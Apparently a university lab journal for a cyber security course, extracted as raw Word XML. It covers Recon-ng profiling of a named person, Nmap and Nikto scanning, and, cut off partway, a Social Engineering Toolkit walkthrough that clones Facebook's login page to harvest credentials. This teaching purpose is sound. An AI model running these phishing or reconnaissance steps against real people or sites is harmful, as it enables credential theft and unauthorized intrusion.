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MUMBAI </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M.Sc. Computer Science – Semester III </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Track B: Security </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Elective II: Cyber Security and Risk Assessment </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JOURNAL </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2022-2023</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Seat No. _________________</w:t>
      </w:r>
    </w:p>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00275" cy="857250"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65"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2200275" cy="8572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tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>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000125" cy="971550"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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0001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MUMBAI </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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 </w:t>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work entered in this journal was done in the University Department of Computer Science laboratory by Mr./Ms._____________________ Seat No. ____________ for the course of M.Sc. Computer Science - Semester III (CBCS) (Revised) during the academic year 2022- 2023 in a satisfactory manner. </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  </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">____________ </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In-charge </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Head of Department </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 </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External Examiner</w:t>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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>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4095"/>
        <w:gridCol w:w="1215"/>
        <w:gridCol w:w="1290"/>
        <w:gridCol w:w="1785"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1455"/>
            <w:gridCol w:w="4095"/>
            <w:gridCol w:w="1215"/>
            <w:gridCol w:w="129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open-source intelligence and passive reconnaissance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enumerating host, port, and service scanning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vulnerability scanning and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use of Social Engineering Toolkit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Wireless and Bluetooth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Exploiting Web-based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using Metasploit Framework for exploitation.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on injecting Code in Data Driven Applications: SQL Injection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Network threats (sniff wifi hotspots, analyze strength, discover wireless access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1</w:t>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Use of open-source intelligence and passive reconnaissance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 Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open-source web-based reconnaissance can be conducted quickly and thoroughly.</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Working: </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Kali Linux Virtual Machine. And Open Terminal.</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Type </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">recon-ng</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to enter the console.</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2466975"/>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8101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Initially there are no modules installed. To install the modules, we need to use the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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Discovery module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">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marketplace install discovery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">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774700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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Recon module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">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marketplace install recon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096">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159000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="123" name="image120.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image120.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1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Importing module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">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marketplace install import</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099">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57800" cy="1009650"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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2578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Exploitation module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">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marketplace install exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">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867400" cy="781050"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="109" name="image129.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image129.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="58674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Reporting module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">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marketplace install reporting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F">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38700" cy="1457325"/>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8387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required modules are installed.</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To create a new workspace</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4">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workspaces list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">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29200" cy="35433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029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Install the module recon/domains-contacts/whois_pocs and load the installed module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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 xml:space="preserve">marketplace install recon/domains-contacts/whois_pocs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68400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="118"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Set the option and run the module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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options list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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162300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53"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Type back and enter the workspace. We will install another module recon/profiles-profiles/namechk and load the module to validate the user Brandon Stout.</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122" name="image117.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image117.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1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Set the option and run the module.</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4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Type back and enter the workspace. We will install another module recon/profiles-profiles/profiler to check the existence of user Brandon Stout.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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marketplace install recon/profiles-profiles/profiler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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modules load recon/profiles-profiles/profiler</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87500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="85"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Set the option and run the module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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options list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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run</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4991100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="80"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55911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Generate a Report. We will install another module reporting/html and load the module to generate a report in html file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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back</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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marketplace install reporting/html</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676275"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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5911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1571625"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="73"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5054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option and run the module.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1866900"/>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4768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100" cy="523875"/>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3721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Html file is generated in given location. Go to the location and double click on the file.</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3419475"/>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1339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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Command Line Utilities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Ping</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Ping is a command line utility, available on virtually any operating system with network connectivity, that acts as a test to see if a networked device is reachable. The ping command sends a request over the network to a specific device.</w:t>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4657725"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="129" name="image128.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image128.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="49339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Public IP of the given domain. Check the size of the packet which can be received by the destination.</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7725" cy="1952625"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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46577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3971925"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21"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6482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how much TTL router would take to discard the packet.</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1990725"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="91"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46291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Tracert using Ping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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3975" cy="1628775"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="104"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51339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6300" cy="4333875"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="116" name="image124.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image124.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="46863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Tracert: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Traceroute is a network diagnostic tool used to track in real-time the pathway taken by a packet on an IP network from source to destination, reporting the IP addresses of all the routers it pinged in between. Traceroute also records the time taken for each hop the packet makes during its route to its destination.</w:t>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7825" cy="2619375"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="106"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54578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125"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NSLookup: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NSLookup (from name server lookup) is a network administration command-line tool for querying the Domain Name System (DNS) to obtain domain name or IP address mapping, or other DNS records.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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4572000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="78"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43910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2</w:t>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Practical on enumerating host, port, and service scanning</w:t>
      </w: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 Enumeration of various services that are running on a target machine using Nmap. To enumerate services on target machine, perform the following steps: 1. Launch Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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0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enumerate services on target machine, perform the following steps: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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Launch Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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Applications &gt; Information Gathering &gt;nmap, as shown in the Figure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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5100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="103"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w:t>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5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Type ‘nmap -sP 192.xx.xx.xx/2’, and press Enter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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66800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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'Nmap' will scan all the nodes on the given network range and display all the hosts that are running, as shown in Figure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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0"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58"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Type 'nmap -sS &lt;IP address of the target machine&gt;', and press Enter, as shown in Figure (here we have used 192.XX.XX.XX as the IP address).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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105"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 Stealthy synscan will be initiated, and all the open ports that are running on the machine will be displayed, as shown in Figure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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87800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="127" name="image126.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image126.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4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see all the open ports along with the services. We will find the version of each of these services running on the open port by performing a syn scan with the version detection switch.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Type 'nmap -sSV -O &lt;IP address of the target machine&gt;', and pressEnter, as shown in Figure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Nmap performs the scan and displays the versions of the services, as shown in Figure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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3981450"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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340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found the enumerated result. We will now save the scan result.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Type 'nmap -sSV -0 &lt;IP address of the target machine&gt; -oN Enumeration.txt', and press Enter, as shown in Figure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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1514475"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="17"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8864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w:t>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4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Nmap will now perform Stealthy Scan with version and OS detection, and save the result in a text file (Enumeration.txt), which will be located on home (root) directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Click on Places &gt; Home Folder, as shown in Figure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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4038600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49"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150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Double click on the file Enumeration.txt, as shown in Figure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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89400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="114" name="image113.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image113.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4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window will appear, as shown in Figure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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4076700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="30"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8674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check the scanning result in the command line terminal. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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'cat Enumeration.txt', and press Enter, as shown in Figure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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1009650"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="82"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58102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output of the scanning process will be shown in the command line terminal, as shown in Figure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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3914775"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="86"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58674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13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demonstrated how to enumerate the services that are running on the target machine and find the vulnerabilities of the services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Practical on vulnerability scanning and assessment </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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demonstrate how to: Perform vulnerability analysis using Nikto. In order to carry out this lab, you will require the following: 1.Administrator privileges 2.Web browser with Internet connection 3.Kali Linux </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Kali  Linux  for  vulnerability  scanning  and  use  Nikto  to  scan  for  known vulnerabilities, perform the following steps: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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1.Log in to Kali Linux and open Terminal, as shown in Figure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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1485900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66"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36766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2.Type the command nikto -h &lt;URL of website you want to scan&gt; and press Enter, as shown in Figure </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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543300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="97" name="image98.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image98.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="53435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3.Note a vulnerability number, for example 23654, and open a web browser </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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4.Type the URL https://cve.mitre.org/ in the browser to open the Common Vulnerabilities and Exposures website, as shown in Figure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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314700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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3625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Search CVE List and type your vulnerability number in the text box, as shown in Figure and press enter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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295650"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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3625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give a list of vulnerability details, as shown in Figure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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314700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="27"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353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Practical 4</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Practical on use of Social Engineering Toolkit </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Sniffing Facebook credentials using Social Engineering Toolkit. We will require the following: 1. Kali Linux as virtual machine 2. Web browser with Internet connection 3. Administrative privileges.</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social engineering and obtain the credentials of the target user, perform the following steps: </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1.Log in to Kali Linux as a Virtual Machine. </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2.Go to Applications &gt; Exploitation Tools &gt; SET Social Engineering Tool, as shown in Figure 1.</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695700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="81"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2578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you will get the Set menu, as shown in Figure 2.</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838575"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="48"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53435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list of social engineering methods will appear, as shown in Figure 3.</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3.Type ‘1’ to choose the Social Engineering Attacks, as shown in Figure 3. </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962400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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3435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list  of  menus  in  the  social  engineering  attacks  will  appear,  as  shown  in Figure 4. </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4.Type ‘2’to choose the Website attack vectors, as shown in Figure 4. </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952875"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="84"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35305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5.In the next screen that appears, type ‘3’ to choose the credential harvester attack method, as shown in Figure 5. </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095625"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="36"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3435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 6.</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3448050"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="19"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2101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6.Type ‘2’ to choose Site Cloner, as shown in Figure 7.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 8. </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it will prompt for IP address for the PostBack in Harvester/Tabnabbing, as shown in Figure 8.</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3419475"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59"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1911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7.Type the IP address of the Kali Linux of VM. Here, we have used 192.XX.XX.XX as the IP address, as shown in Figure 9.</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3505200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54"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2673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 will prompt to enter the URL of the website which is required to be cloned. </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8.Type www.facebook.com, as shown in Figure 10.</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225" cy="3457575"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6"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2292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9.Type www.facebook.com, as shown in Figure 10.</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3562350"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="102" name="image119.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image119.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="52482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 11</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552825"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="119" name="image121.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image121.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
